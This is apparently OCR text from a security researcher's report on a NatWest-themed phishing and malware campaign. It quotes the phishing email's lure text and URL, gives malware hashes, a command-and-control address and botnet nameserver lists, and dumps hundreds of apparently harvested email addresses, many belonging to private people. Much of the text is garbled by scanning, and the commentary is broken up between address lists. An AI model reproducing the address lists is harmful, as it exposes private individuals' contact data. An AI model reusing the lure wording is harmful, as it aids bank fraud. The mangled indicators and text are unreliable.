Banking Details Email Content: //pool32-nwolb20.com/customerupdate?cid=3D37kwsze- 
wcnnhrrDRCfszlaucndsOoerdnOk hOvp These directives are to be sent and followed by all cus- 
tomers of the Natwest On-line Banking NatWest Bank does apologize for the troubles caused 
to you, and is very thankful for your collaboration. If you are not user of NatWest Bank Dig- 
ital Banking please delete this letter! *** This is automatically generated message please 
do not reply *** (C) 2008 Natwest Bank On-line Banking. All Rights Reserved. Attached File: 
"rwu909.gif" (image/gif) 


What is making an impression besides the malicious economies of scale achieved on behalf of 
the malware infected hosts used for sending, and as we’ve already seen, hosting and phishing 
pages and the malware itslef? [3]lt’s the campaing’s [4]targeted nature in respect to the 
[5]segmented emails database used for achieving a better response rate. The National West- 
minster Bank Plcis a U.K bank, and 10 out of 15 email recepient are of U.K citizens, the rest are 
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denysedooganhamh@hotmail.com 
zexro1337@gmail.com 
Ilbbosompem@yahoo.com 
immesiaenlabs@mail.ru 

fendic img@yahoo.com 
bubbleslug@fenionline.com 
bubblesbty@fenionline.com 
sportingbetcom@go2.pl 
melvin.laryea@web.de 
bubbleslyq@fenionline.com 
pearson.jennifer.989@gmail.com 
timychann@gmail.com 
bubblesuru@fenionline.com 
bubblesjod@fenionline.com 
bubbleswcf@fenionline.com 
zzagalo@yahoo.com 
bubblesvwp@fenionline.com 
bubblesfso@fenionline.com 
cliffords.a.n.d.y.3.4@gmail.com 
weiserschneel@yahoo.de 
stob.a.k.sow.ume.ya.e.s.t@gmail.com 
gamesfzo@fenionline.com 
bubblesoeq@fenionline.com 
immerekeeni@mail.ru 

custom _rims@rocketmail.com 
bubblessne@fenionline.com 
deal.here@yahoo.com 
banadydys@yahoo.fr 
Devil79@gmail.com 
st.o.b.akso.wum.ey.a.est@gmail.com 
sanidhaykumar95@gmail.com 
bubblessuo@fenionline.com 
bubbleszay@fenionline.com 
stainless88@gmail.com 


bubbleswhi@fenionline.com 
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ravyn the _corrupt@yahoo.com 
bubblesihn@fenionline.com 
urbattbeatt@gmail.com 
karvariblepuq@gmail.com 
bubbleseff@fenionline.com 
bubblesrpi@fenionline.com 
is.id.r.o.pot.t.e.r@gmail.com 
111222333zzz@bk.ru 
mowemobby@mail.ru 
mstf.0zkn@hotmail.com 
bubblesljn@fenionline.com 
z.u.b.rilo.th.ebe.s.t@gmail.com 
yjhv6viu@mail.by 
wuffloo@cedpono.co.cc 
bubblesaef@fenionline.com 
bubblesrhi@fenionline.com 
sto.b.ak.so.wu.me.y.a.es.t@gmail.com 
vjes@live.nl 
mulemail411@yahoo.com 
borg@null.net 
burlakovahlafap@mail.ru 
niktocv@yahoo.com 
bubblespbz@fenionline.com 
ijalbatoe@gmail.com 
bubblesjyt@fenionline.com 
362f7363@0sx.ru 
bubblesgvu@fenionline.com 
bubbleshgx@fenionline.com 
bubblesukt@fenionline.com 
bubblesrdi@fenionline.com 
michael mathis53@yahoo.com 
asd@asd.com 
bubblesuxh@fenionline.com 
bubbleshio@fenionline.com 
crypto _gigih@yahoo.co.id 
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pear.son.jennifer989@gmail.com 
distanceengineer@gmail.com 
bubblesvla@fenionline.com 
getgoodmail@allmp3stars.com 
internet4hacking@gmail.com 
pubeame@gmail.com 
nipelsi@gmail.com 
selasiemoney@gmail.com 
bubblesdlp@fenionline.com 
jb.stalin@yahoo.com 
bes.t.o.ff.theb.e.zt@gmail.com 
hackcocain@yahoo.com 
inocent _kill3r@hotmail.com 
bubblesovd@fenionline.com 
bubbleswzr@fenionline.com 
bubblesrhx@fenionline.com 
dargilkey@gmail.com 
bubblesweb@fenionline.com 
bubbleshds@fenionline.com 
bubblesrtb@fenionline.com 
kirkbrown371@hotmail.com 
darellcabarrus@yahoo.com 
bubbleskhj@fenionline.com 
bubblesjxf@fenionline.com 
fexonat@bimgir.net 
br.ian767toyou@gmail.com 
shanemaurice@hotmail.co.uk 
empetri@luckylooking.com 
j.o.nn.ys.e.x.boyf.li.ms@gmail.com 
kretino@mail15.com 
xiuhacking@gmail.com 
bubbleseaf@fenionline.com 
bubblessmt@fenionline.com 
b.e.st.of.ft.he.b.ezt@gmail.com 


hdeeman@yahoo.com 
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awal.2@hotmail.com 
s.t.ob.aks.ow.u.m.eyaest@gmail.com 
bubblesgmj@fenionline.com 
bubblesomy@fenionline.com 
udoematon@yahoo.com 
bubblesnhm@fenionline.com 
bubblesanv@fenionline.com 
bubbleslfbo@fenionline.com 
bubblesyjq@fenionline.com 
Rick79@gmail.com 
buzz102region@gmail.com 
support@goodmedstore.com 
bubblesidc@fenionline.com 
ytf|k@gmail.com 
bubblesiia@fenionline.com 
juan@flirt.com 
drupts@gmail.com 
nowak567@o2.pl 

c _p05ng@yahoo.com 
edwa@bestzapchast.ru 
d_westside@hotmail.com 
bubbleslec@fenionline.com 
hisayegotmguv@gmail.com 
bubblesngo@fenionline.com 
bubbleskzh@fenionline.com 
bubblesnul@fenionline.com 
bubblesvrk@fenionline.com 
alhcrew@gmail.com 
bubbleseic@fenionline.com 
bubblesrux@fenionline.com 
sdykfj44sldd@Osx.ru 
bOr1s.xtreme@gmail.com 
maozebong@hotmail.com 
car664@fenionline.com 


bubblesawp@fenionline.com 
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retwwjl@hotmail.com 
games381@fenionline.com 
bubblesgxo@fenionline.com 
b.e.s.toff.t.he.b.e.z.t@gmail.com 
bubblesjai@fenionline.com 
bubblesepf@fenionline.com 
iva@tpsiweb.com 
bubblesoch@fenionline.com 
ardellgrissongckf@hotmail.com 
gamesgip@fenionline.com 
arjun _2199@yahoo.com 
uploadboss@gmail.com 
nelsoncordeiro27@gmail.com 
virendraaa _hi@rediffmail.com 
unsonsona@zadonsk.net 
bubblespbv@fenionline.com 
vhohote@medic-pills.org 
teens-xxx2@dlteyse.jino.ru 
jj@fastfarmshop.com 
ieqr@fenionline.com 
myfortuna02@gmail.com 
mezdecd@zlocorp.com 
pear.sonjennifer9.89@gmail.com 
ratio888hq@yahoo.co.uk 
ediukonm@list.ru 
indishell.crazyOO9@gmail.com 
h60d39@tom.com 
b.e.st.offt.he.be.z.t@gmail.com 
stkhacker@gmail.com 

Bian _lien30@yahoo.com 

rebo inc@yahoo.com 
iykhh2@fenionline.com 
gaudet983@hotmail.com 
rokita@gmail.com 


believe facel@yahoo.com 
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ozisbo@yahoo.com 
xiaozhangn127@tom.com 
gennleono@gmail.com 
cnug@fenionline.com 
kkozela@gmail.com 
coroteiro@yahoo.com.br 
cherry@xakep.ru 
bes.to.fft.h.e.be.z.t@gmail.com 
yserrieh@gmail.com 
clifford.sandy3.4@gmail.com 
ganchin@yahoo.com 
parse7000@mail.ru 
gracelynmonserratblack@gmail.com 
galpeleg22@gmail.com 
jayboer123@yahoo.com 
blackwidow305@aol.com 
diebaob4865@tom.com 
pkbevel2@gmail.com 
beatblumfigak@gmail.com 
shio fu@yahoo.com 
badlouai@Hotmail.com 
leon.cooke1959@gmail.com 
caibaio3085@tom.com 
jone2002ys@yahoo.com 
quvox2@fenionline.com 
takafethercab@gmail.com 
mohannedist@gmail.com 
borisoguan@gmail.com 
zx7blurr@juno.com 
intimvreale@dlteyse.jino.ru 
nmxrq2@fenionline.com 
jukenifopinp.t@gmail.com 
v130cc@tom.com 
eximrulez@mail.ru 
untostero@mail.ru 
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anjr@fenionline.com 
net2hack@gmail.com 
get.good.ma.il@allmp3stars.com 
thunder _m.hassan@live.com 
wallsquissei@farmaco.uni.cc 
r.ogerschmidt.2@gmail.com 
X-006@hotmail.com 
g.ri.go.r.kinsjic@gmail.com 
annis5058np@aol.com 
markdestinoff@aol.com 
dorriskraus@mail.ru 
system-fx@tyhrf.jino.ru 
giorgisoxadze@gmail.com 
kotolyub@gmail.com 
dufopaw@gmail.com 
get.good.mail@allmp3stars.com 
valdisdalziel4030@gmail.com 
dasammy@ymail.com 
bwksp2@fenionline.com 
mrs.neobyadverl@gmail.com 
feklaivanova@bk.ru 
JeramiahSawyer@gmail.com 
penarol2@hotmail.com 
michell34094@gmail.com 
aldrinupz@yahoo.com 
kingrambo01@yahoo.com 
bogadinar@tlen.pl 
jonny@samoe-samoe. info 
theclowen@gmail.com 
ujjO04@yahoo.com 

sulary _ib007@yahoo.com 
gokkulnath@gmail.com 
rongchouh3763@tom.com 
busadulsina@mail.ru 

flash5 84@hotmail.com 
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ckmw@fenionline.com 
appositeuxcardenas@gmail.com 
rashford2@gmail.com 
Moreshields@live.com 
air2269@tom.com 
koortkonors@weeq.ru 
mimiloj9@mail.ru 
okkazaky@yahoo.com 
qwertylalal@hotmail.com 
egodeath@gmail.com 
BrainDamage@doctor.com 
a9483a@tom.com 

chronic sticky 420@yahoo.com 
myththtt@vfemail.net 
rogerschmi.dt2@gmail.com 
guangchui383@tom.com 
bigboobsman2011@gmail.com 
cynthiabrooklynnrichards@gmail.com 
lewis66mcclain@yahoo.co.uk 
tfcz@fenionline.com 
richbill9L@yahoo.com 
fmkgz2@fenionline.com 
farrenethehox@gmail.com 
d.averrraxv@gmail.com 
ew210@tom.com 
ph3wl@yahoo.com 
maurj.caceres@hotmail.com 
car214@fenionline.com 
newbeen@mail333.com 
bubblesxbz@fenionline.com 
naughty@dlteyse.jino.ru 
b.es.t.off.t.h.ebe.zt@gmail.com 
dud.vania@yandex.com 
zug464@tom.com 
josephmorpheus@gmail.com 
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bestoff.th.e.bezt@gmail.com 
www 10@onlysingleparentsdating.co.uk 
rizkykikil1986@gmail.com 
b.e.st.of.ftheb.ezt@gmail.com 
deannabilonn@aol.com 
williamwallace96@live.com 
kira370@ymail.biz.tm 

krist. myer@gmail.com 
mybuttermail@yahoo.com 
lbv.dagys@gmail.com 
exxtrack@yahoo.com 
g.unter.mebs@gmail.com 
mythingsthings@aol.com 
garry37morales@yahoo.co.uk 
tumseali@gmail.com 

yuyu _ionut@yahoo.com 
anishe34@nikoncamerabag.info 
richardfsorence@aol.com 
omerexpert@hotmail.com 
raymond153ue@aim.com 
lenitagasgpliardi@hotmail.com 
aloclaisti@trustedtabs.co.cc 
usama _akram2005@yahoo.com 
hannah98@banana.us.to 
pulsewholesale@dlteyse.jino.ru 
catalina0101zl@aim.com 
shamsplaill@mail.ru 
jeane94@thermoplasticelastomer.net 
eastbooking.ua@list.ru 
mr.manzalawi@ymail.com 
ohan-palych@mail.ru 
kerri8864r@aol.com 
dan0266@yahoo.com 
faltasira@yandex.ua 


makkibuff@gmail.com 
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ivo.register@gmail.com 

losty dream@mail.ru 
dritro@live.com 
malet@gmx.com 
slavoxm@yahoo.fr 
pfeiffer735zxo@yahoo.co.uk 
kylenhott98@gmail.com 
topsupplements@prokonto.pl 
dhope312@gmail.com 

fook yew _man@hotmail.com 
agapov08.05@gmail.com 
thecalmsuns@gmail.com 
neo.jeo2@gmail.com 
slduvkowqsa@mail.ru 
maximv@gmx.com 
enabunto.n00@gmail.com 
23@gmail.com 
giugifalchi@gmail.com 
alia91@nikoncamerabag.info 
michelle9289k@aol.com 
g.et.good.mail@allmp3stars.com 
quitpok@yahoo.com 
DiamondDumpz@hotmail.co.uk 
titsotu@gmail.com 
vpartner@tyhrf.jino.ru 
gacil@rocketmail.com 
harry@trumanpost.com 

oh _shit _its.bobby@yahoo.com 
blasimac@yahoo.com 
faris.france93@Qlive.fr 
ge.t.good.mail@allmp3stars.com 
james.more33@yahoo.com 
vtupolev2@gmail.com 
itzyoshii@live.co.uk 
muatanyah@operamail.com 
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targeting Italian users. Malware variants signal their presence to 66.199.241.98/forum.php 
and try to obtain campaigns to participate in, this is a sample detection rate for the latest 
fake news items one, and more details on the domains and nameservers used in the latest 
campaign : 


news _report-pdf content.exe 
Scanners result : 14/31 (45.17 %) 


Backdoor.Win32.Agent.gvk; Backdoor:Win32/Agent.ACG 
File size: 45056 bytes 


MD5...: C4849207a94d1db4a0211f88e84b0b59 
SHA1..: 32ef2a074d563370f46738565ecf9bb53c75909c 


aoe Bee eee eee 


.nsi.nsi.ns2.ns3.id7S9.co nsi.ns4,.ns2,ns3. 
.ns1.ns1.ns2.ns3 ns3.nsi.id759.com 
.ns1.nsi.ns2.ns3.id759.co nsi.ns2.ns1.954.nS2.ns3,id759.com 
nsi.ns2 
nsi.ns2.ns4.id759,com 
si.ns¢.ns4, $3.id759,com 


ns3.ns2 
ns3.ns2.ns3, 
ns3.ns2.ns4.id 


.NS1.ns2.ns3, 9 ns3.ns4.ns2, 
.ns1.9$1.n$2.ns3.id759.co ns3.ns4.ns3.ns1.id759,com 
Ad759, com 
ns1.ns2.ns3.id7S9 
nsi.nsi.ns2.ns3. CO ns4.nsi.nsi.ns2.ns3,id759.com 


s1.nsi.nsi.ns2.ns3.id759 ns4.ns2,ns1.ns4.ns2.ns3,id759.com 


nsi.nsi.nsi. 
nsi.nsi.nsi. 
nsi.nsi.nsi. 
nsi.nsi.nsi. 
nsl.nsil.nsi. 
nsl.ns 
nsi.nsi.nsi. , ns3.nsi, 
ns3.nsi, 
nsi.nsi.nsi.ns ; ns3.nsi, 
nsi.nsi.nsi. 3, 9 nsi.ns2. nS4.n52.ns3.id759.com 


1429 


joey0519f@aol.com 
lemonbudd@yahoo.com 
connorstoneberg@ymail.com 
oleggry.aznov@gmail.com 
sweetydreamsss@gmail.com 
flaviusone@yahoo.com 
peterstiv@aol.com 
chana7653np@aol.com 
seidel@yopmail.com 
prinsteval234@yahoo.com 
jdunes4@aol.com 
hrumer7re.g@gmail.com 
induseraini@mail.ru 
kueie@yslonsale.com 
jj84ms10369@aol.com 

xdb _dbx@yahoo.com 
regenia591i@aol.com 
minhanh9x@gmail.com 
aurigar4579@mail.ru 
spiaggia34@gmail.com 
somename@hushmail.com 
accaaaa@mail.ru 
legginsmaddie@yahoo.com 
peterkkkkk@mailinator.com 
nader-nor31@hotmail.com 
tagkaiss@gmail.com 
klomax45@yahoo.co.uk 
sharia4uk@hotmail.co.uk 
leetbot15@hotmail.com 
keepersain.t@gmail.com 
rorsacrormmiz@mail.ru 
marcellusjsak@gmail.com 
mattspinorf@yahoo.com 
meshlas@gmail.com 


chinggador@gmail.com 
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hacking t@yahoo.com 
anandamritdip@gmail.com 
games484@bosahek.com 
xrtest47@tlen.pl 
aa.am81@yahoo.com 
ashleamuckhec@gmail.com 
larryking 2@live.com 
joey0519f@aim.com 
ben.steave05@gmail.com 
dennichristiangreat@gmail.com 
chasityatb|@aol.com 
games266@bosahek.com 
bobrichard11@yahoo.com 
albamedia@hotmail.it 
eliemacgougos@gmail.com 
rado485@tyhrf.jino.ru 
slov@tyhrf.jino.ru 
get.goo.d.mail@allmp3stars.com 
nice4u85@yahoo.com 
skenz12@gmail.com 
casiofever@yahoo.com 
nikolaysmaruhin@gmail.com 
hurekutrwns@mail.ru 
hrumer.7r.e.g@gmail.com 
brazendumps@rocketmail.com 
oaklyjms@aol.com 
aileanalvicuf@gmail.com 
whymeletme@yahoo.com 
lomaztychohuj@gmail.com 
ylodurmdail@gmail.com 
sscanless@aol.com 
games315@bosahek.com 
s.h.a.ni.t.a.gl.a.rs.on@gmail.com 
kaihekoamarop@gmail.com 
eteskSemSkask@TesentVat.ne 
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readylivenow123@live.com 
latfullinvasilii@mail.ru 
games639@bosahek.com 
meister 5555@msn.com 
eezyghost@hotmail.com 
rad628@tyhrf.jino.ru 
raymond153ue@aol.com 
elijahyomah@yahoo.com 
gad2@abv.bg 
t.aw.a.n.d.akx.rg@gmail.com 
ogagster11@yahoo.com 
doloskish@mail.ru 
poz1008@o2.pl 
igiorga@aol.com 
catalina0101zl@aol.com 


jimz67@yahoo.com 


che.r.iseb.a.r.n.h2.0.f@gmail.com 


ola@pytanka.com.pl 
ilana6054c@aim.com 
kronosaegle11@hotmail.com 
skingsOO8@gmail.com 

ubss 007@yahoo.com 
bewithwarren@yahoo.com 
real@anunciogratuito.es 
camara.taylor@hotmail.com 
xivahetelipte@gmail.com 
asia70@tungsten-carbide. info 
andrwsdvsky@hotmail.com 
alvina401!I@aol.com 
srsly@gmx.us 

atteduffo 808@yopmail.com 
deree.v77@gmail.com 
erf3@insuranceinstrutions.com 
cindymilley345@gmail.com 


piperjohnstonkobe@gmail.com 
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nowak554@go02.pl 
games634@bosahek.com 
abeeb oduola@yahoo.com 
games961@bosahek.com 
hostmyengine@hotmail.com 
games274@bosahek.com 
games816@bosahek.com 
games626@bosahek.com 
anders-t@mail.ru 
chongqin0D50@gmail.com 
kuch@tyhrf.jino.ru 
zuzamodbal@gmail.com 
pharma@adultvipsearch.com 
games829@bosahek.com 
logoutcosmin@yahoo.com 
jdlovesl12@yahoo.com 
games256@bosahek.com 
waleed 1436@yahoo.com 
zuflemi@gmail.com 
baralinkal966@prokonto.pl 
sl.mnsvtvsvt5@gmail.com 
ripperiamnot@yahoo.com 
bledche@gmail.com 
margiottajgig@gmail.com 
rassilka@vodila.in 
ouxbmave@hotmailboxlive.com 
jasminl15@gmx.com 

yan _fleming@mail.ru 
roge.rs.chmidt2@gmail.com 
lybribeFluore@gmail.com 
aduda76@yahoo.com 
smilyperez@allmp3stars.com 
langsburyfhek@gmail.com 
games799@bosahek.com 
alexmikein@gmail.com 
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qualunquementee@aol.com 
holipaser@gmail.com 

marcos _joker@hotmail.com 
ultradz@gmail.com 
cbeej58@gmail.com 
rbt0424@gmail.com 
handson266@gmx.com 
robin.sebastian@aol.in 
sanchezm1024@gmail.com 
fasettseda@mail.ru 
507736967@521882853.com 
ukhack@ymail.com 
eastbooking.ua7@gmail.com 
r00t3x@hotmail.com 
yngxl78@gmail.com 

mir _soft@ymail.com 
john.stevens1000@gmail.com 
m.elodiepreisach@gmail.com 
123456.789alexiss@gmail.com 
minkyyeahsyav75@gawab.com 
yuiseto@yahoo.com 
justin-jones@live.co.uk 
xrtest54@go2.pl 
dtindungtk@yahoo.com 

ashok _open@yahoo.co.in 
thomas.paine.jr912@gmail.com 
d4rkchris@live.de 
johnsmith@htc-incredible.com 
chasez@sina.cn 
linceyjathdaw@gmail.com 
mesapx@bosahek.com 
anonymousguys@gmail.com 
dan4hay1l@yahoo.com 
carter.mcneil79@gmail.com 


33wew22q@gmail.com 
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mesdft@bosahek.com 
kontopocztowewojtk.anowaka@gmail.com 
kylelyndsi@gmail.com 
twipplel0@gmail.com 
bruseadams@yahoo.com 
danevchandsij@gmail.com 
kirilhala4579@mail.ru 
polsysO7@o2.pl 
phleslfzyn@gmail.com 
ensjoshi@gmail.com 
hoctg@live.hk 
tooren8@hotmail.com 
n3verback@yahoo.com 
ytube.ts2695@gmail.com 
asadbhatti85@yahoo.com 
tatufreek6669@gmail.com 
johnray112@yahoo.com 
cainjane38@yahoo.com 
carders emperor@yahoo.com 
roetrusemic@yandex.com 
soyncragreery@mail.ru 
xepokop1987@gmail.com 
reubont@gmail.com 

allen _alanwek@gawab.com 
house@house.co.uk 
mikaXXXrated@aol.com 
htcevo4g123@babycentral.org 
kontopocztowewojtka.nowaka@gmail.com 
workfromhome@o2.pl 
kurtkringer@googlemail.com 
Effossesy@denniscoltpackaging.com 
a.S.h.v.a.n.n8.3@gmail.com 
jsmt850@aol.com 
tatli9tarifleri@yahoo.co.uk 
mp3indir95yukle@yahoo.co.uk 
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r.madrid samir@hotmail.com 
leni456@ymail.biz.tm 
oleggrya.znov@gmail.com 
bvesssmith@yahoo.com 
clown@live.ca 
dumbellowgjaz@gmail.com 
yanilrulesforsure@gmail.com 
iloveu@bienclassee.fr 
billye223wz@aim.com 
barmlev15@walla.com 
ali _ki dosti4all@yahoo.com 
tehcaps@live.ca 
macsahota@hotmail.com 
oratorinka1990@prokonto.pl 
cierduno6@mail.ru 
biker20115123@mail.ru 
tucazo25@yahoo.es 
i.Sid.rop.o.t.ter@gmail.com 
familyname39@yahoo.co.uk 
tq _point@yahoo.com 
hashaam _khan2002@yahoo.com 
elsysi.S.c.0.19@gmail.com 
owens@kimyatr.com 
579466885@567569980.com 
tabhealth@gmail.com 
kismethackwet@gmail.com 
vakii@insuranceinstrutions.com 
pro.momehc@gmail.com 
ida09@banana.us.to 
newd723@tyhrf.jino.ru 
linaiddonzego@gmail.com 
geteyedeguval@gmail.com 
arasnankin@o2.pl 
law-p@tyhrf.jino.ru 
coylimited@aol.com 
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gruz-orion2@mail.ru 
kingcluel@gmail.com 
nlarjzka51980@maail.ru 
ricardospencer36@yahoo.com 
normavillsbat@gmail.com 
j-carvalhol0O@hotmail.com 
nobleman@rocketmail.com 
508386227@510220050.com 
anta_mannal2@tlen.pl 
harryspender@yahoo.com 
greykingforever@gmail.com 
nanameierwiesen@yahoo.co.uk 
zufar _dyupin@mail.ru 
Mr.brains@yahoo.com 
557360276@559664293.com 
lucettamaccet@gmail.com 
bazilio 66@mail.ru 
johnplistro@crestrepsolhrc.com 
crashadog@hotmail.com 
sergiophilips@aol.com 
webregaruu@mail.ru 
pciauxjfva@meltmail.com 
egwwzpci@horrifyingtales.info 
n.ikolaysmaruhin@gmail.com 
twistedwebdesigns@gmail.com 
jacekplacekwow@gmail.com 
rebbeccaculotta@gmail.com 
vyrtua@gmail.com 
valentinkakyrs@mail.ru 
wkeivcbd@list.ru 
dayanarabezer@gmail.com 
mirage0411@gmail.com 
jabermontfgif@gmail.com 
philip.icyl01@yahoo.com 
dsafdsfaafsd@prokonto.pl 
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mary.james309@yahoo.com 
nhocvsb@gmail.com 
ballendinelug@gmail.com 
rashadklasnoz@gmail.com 
sprremix1234@gmail.com 
thpt m@yahoo.com 
ddrmsrvr@aol.com 
miakaimlacboj@gmail.com 
jarrattlidsux@gmail.com 
mark.jhonson35@gmail.com 
canlitvizle@gmx.com 
idesapear2007@hotmail.fr 
kiif2011@gmail.com 
gravien@yahoo.com 
yash.sabat@gmail.com 
farhan255e@ymail.com 
dreadnaughtsO8@yahoo.com 
xrtest71@o2.pl 

hack _mailers@yahoo.com 
adrenalink _nol@live.com 
14123501337@yahoo.com 
bruno _2@live.com 
bayer.gabler.michael@web.de 
zoe.picks@gmail.com 
krushhd@hotmail.com 
20@gmail.com 
baynore@yahoo.com 
erlindare@aol.com 
doomed40@yahoo.com 
ugotfukd2@yahoo.com 
sakirovis@mynet.com 
manding23@gmail.com 
office@badcredit-refinance.com 
585962434@579795601.com 


bazelllibifan@gmail.com 
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kimberleyunderwood@email.com 
fernand1695@yahoo.fr 
simnsvtvs.vt.5@gmail.com 
hallyOOO00@yahoo.com 
kenwooodd@mail.ru 
ahmad3849@yahoo.com 
nadezda.rewosar@gmail.com 
hieu210188@gmail.com 
maksimpavlovchchipidrovski.j{@gmail.com 
praksedaenrov@gmail.com 
roni.78@prokonto.pl 
newf836@tyhrf.jino.ru 
zackcute@live.com 
stroymarketon@mail.ru 
strong dumps@yahoo.com 
win666mail@gmail.com 
lauralnoel@aol.com 
guta_galeatal@yahoo.com 
sabine.setlur999@arcor.de 
ulinkal14909@o2.pl 
leopardgcb@aol.com 
funnymenny@medic-pills.org 
sofitelwalker@aol.com 
pp@haseo.org 
jermonegwilaz@gmail.com 
dumps _ccn@yahoo.com 
joannidieddep@gmail.com 
vietinui@yahoo.com 
tattued1@live.com 

the __scorpio@windowslive.com 
trusted carder@yahoo.com 
lazcamper@yahoo.com 
ynutbbgtbtx@mailinator.com 
abou317@tyhrf.jino.ru 
marksum4@aol.com 
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An internal nameservers ecosystem within the botnet, active and resolving : 


ns1.ns4.ns2.ns3.id759.com 


ns3.ns1.id759.com 


ns1.ns2.ns1.ns4.ns2.ns3.id759.com 


ns1.ns2.ns3.id759.com 


ns1.ns2.ns4.id759.com 


ns1.ns4.ns4.ns2.ns3.id759.com 


ns2.id759.com 


ns2.ns1.ns2.ns3.id759.com 


ns2.ns1.ns2.ns4.id759.com 


ns3.ns2.ns1.ns2.ns3.id759.com 


ns4.ns1.ns1.ns2.ns3.id759.com 


Yet another internal nameservers ecosystem within the botnet : 
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a-d-m-i-n-s-t-r-a-t-o-r@hotmail.com 
dominicbball@yahoo.co.uk 
igeeonline@yahoo.com 
savageme@hotmail.co.uk 
mastermind 29 may@yahoo.com 
eyaculadorprecoz@emailservice2011.info 
martin9211 _p@yahoo.com 
itripallday@live.com 

thithuepro 2009@yahoo.com 
tjspicerjr@gmail.com 
tortillal974@prokonto.pl 
darkcolonel@yopmail.com 
torrim33@mail.com 
donnagrissom@realtysoftware.org 
renegatebzrw@gmail.com 
hugable _pisces@yahoo.com 
genuine.seller@yahoo.com 
fl3um4@hotmail.com 
stockfarbrtas@gmail.com 
iogsbvmfyf@meltmail.com 
newensyifrbat@gmail.com 
beadesjulikan@gmail.com 
haibiarlodo@mail.ru 

cutie zymon@yahoo.com 
adhitalambtaw@gmail.com 
agereedygog@xsecurity.org 
tolyn1989@gmail.com 
stopanipacanchi.k@gmail.com 
stopanipacanchik@gmail.com 
gwernbattlxof@gmail.com 
getredfell@allmp3stars.com 
bluescorpion99 red@yahoo.com 
eliorbastapag@gmail.com 
antianarchist666@hotmail.com 


smartgoogle@mailinator.com 
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erickloul.z@gmail.com 
558199643@553076499.com 
znatyOO@yahoo.com 
mardyairiapuc@gmail.com 
s.to.bak.so.wumeyae.s.t@gmail.com 
alishabud.gk.od@gmail.com 
stopanipacanc.hik@gmail.com 
pokpok783@gmail.com 
brandycotilog@gmail.com 
eastbooking.ua8@gmail.com 
camiriafoscon@gmail.com 
simnsvtv.s.vt.5@gmail.com 
tvanrituli@mail.ru 
windows64@vitamin-water.net 
dilawarnelhev@gmail.com 
trO@mailinator.com 
ipho951@tyhrf.jino.ru 
johanstormer@gmail.com 
wallsquisseu@trustedtabs.co.cc 
shawn.thomson18@gmail.com 
ftagliaferri@yahoo. it 
hamzal@hotmail.se 
hi4557@gmail.com 
girisamoggxid@gmail.com 
avshalommanoj@gmail.com 
svetian g@mail.ru 
henfrebraytup@gmail.com 
sam1@vagii.com 
myantology@allmp3stars.com 
borizzz.y@gmail.com 
pentiumcc@yahoo.de 
vyktor33@yahoo.com.mx 
xrumer@mailzer.biz 

diallo _aalpha@yahoo.fr 
marshalman OO8@yahoo.com 
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pronkinz@mail.ru 
hdh.eldon26@gmail.com 
shariefka259@aol.com 
oliwiadunhan@gmail.com 
dasipalka@yandex.ru 
gitordun@mailinator.com 
c5392449@pjjkp.com 
sodiq_dave01@yahoo.com 
hehumillotneq@gmail.com 


hyperbolicsin@hushmail.com 


Coonrypyptoth@mailclubdropbox.info 


rickofdc20032@yahoo.com 
magic.ways@ymail.com 
mormorsedge@hotmail.com 
maddeinser@aol.com 
591900087@539571786.com 


musa68@live.com 


itunes2@insuranceinstructions.com 


bleezeahuizun@gmail.com 
morganator666@hotmail.com 
gulold@yahoo.com 
boysemartenoh@gmail.com 
shainaimorpes@gmail.com 
wkejalk@mail.ru 
seop@seo-progon.jino.ru 
basketfielsor@gmail.com 
karasuku@mail15.com 
rlzbear@yahoo.com 
jeelol@yahoo.com 
sonyssky@gmail.com 
feromonymeskie@o2.pl 
adassyDus@mailclubdropbox.info 
transfer102@tlen.pl 
yourcondition@mail.ru 


rgfffd@gmail.com 
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marconibhajuf@gmail.com 
reboot1976@yahoo.com 
pearlysubert@yahoo.co.uk 
stal1.2.lion@gmail.com 
earwakerarhig@gmail.com 
tvanriulia@mail.ru 
relfyman@hotmail.com 
teancummeekot@gmail.com 
lodhgdhdoodh@yahoo.co.uk 
tvanriuli@mail.ru 
ur.h.oma.r.d.lesax@gmail.com 
isonumone@isonews2.com 
qcnywdovwivnlo@mailinator.com 
588289306@529018111.com 
haliburtonbar@gmail.com 
ninarielLO@gmail.com 
Bigmike20011@gmail.com 
elvira.krausel123@web.de 
kalkulatorxx@mail.ru 
fenderiukass@gmail.com 
gerasebudesefert@fastmailforyou.net 
jajociageougs@mail.ru 
lamescan@gmail.com 
akferarryl1@gmail.com 
bendover4545@yahoo.com 
hohepabowlsov@gmail.com 
thoma.s34hevily@gmail.com 
alawu@live.com 
exoticcarrentalsnyc@gmail.com 
bigeratowers@gmail.com 
owenmark71@yahoo.com 
kalina5200@gmail.com 
feromonymeskie@tlen.pl 
4eq64ha@veriosa.com 
bonnairelibes@gmail.com 
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iapyceposyqa@gmail.com 
melo.diepreisach@gmail.com 
pellamos@gmx.com 
landsmanrepeb@gmail.com 
thomas34h.evily@gmail.com 
doktore888@arcor.de 
shoortattic@mail.ru 
qhnavwrv8242@gmail.com 
andrewkerton55@yahoo.com 
feromonymeskie@go2.pl 
ddarmansya@yahoo.co.id 
thomas34hevil.y@gmail.com 
sa56422@gmail.com 
alosseheent@mail.ru 
vpechatlenya@tyhrf.jino.ru 
geegeejee@aol.com 
bigbaby1906@yahoo.com 
vydsugbad@yopmail.com 
ad.olo89ghblehjr89@gmail.com 
maatheeuzmachado@hotmail.com 
richie.zack@yahoo.com 
sunnymumbai55@in.com 
adryano team@yahoo.com 
sfx _20101@yahoo.com 
danxx34@yahoo.com 
spencer _ricardo@rocketmail.com 
buletin _prof@yahoo.co.uk 
tao.tao@aol.com 
pavlikeve@rx-blog.org 
sadsfasgerter@prokonto.pl 
uaykhs@rzw.com 
saundtrek@hotmail.com 
mr.hiendowels@yahoo.co.uk 
pszppud@gmail.com 
edemover@yahoo.com 
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toplight140@gmail.com 
btauinc@mail.com 
edenfew@yahoo.com 
ayamga@gmail.com 
bestgolfsports9@gmail.com 
Donrekx@gmail.com 
jajaj@Mail.com 
kochamdoduniemojal@gmail.com 
dcmvolam5@gmail.com 
Romalak7@gmail.com 
testxr123@aol.com 
redcrystal254@gmail.com 
Sam48203@hotmail.com 
Ishd.g.d.5.sdh@gmail.com 
aryel088@gmail.com 
shloopypoo@gmail.com 
im.mombun.cdync@gmail.com 
carderszone@gmail.com 
y.viper@hotmail.co.uk 
allisonsegun@ymail.com 
getgfhh@gmail.com 
becola2@gmail.com 
fdgdfgdfghfd56g5@gmail.com 
dkc379@gmail.com 
kokomansion@yahoo.com 
df.gh83.dfgg4v@gmail.com 
longdfdsdiujdwx01@gmail.com 
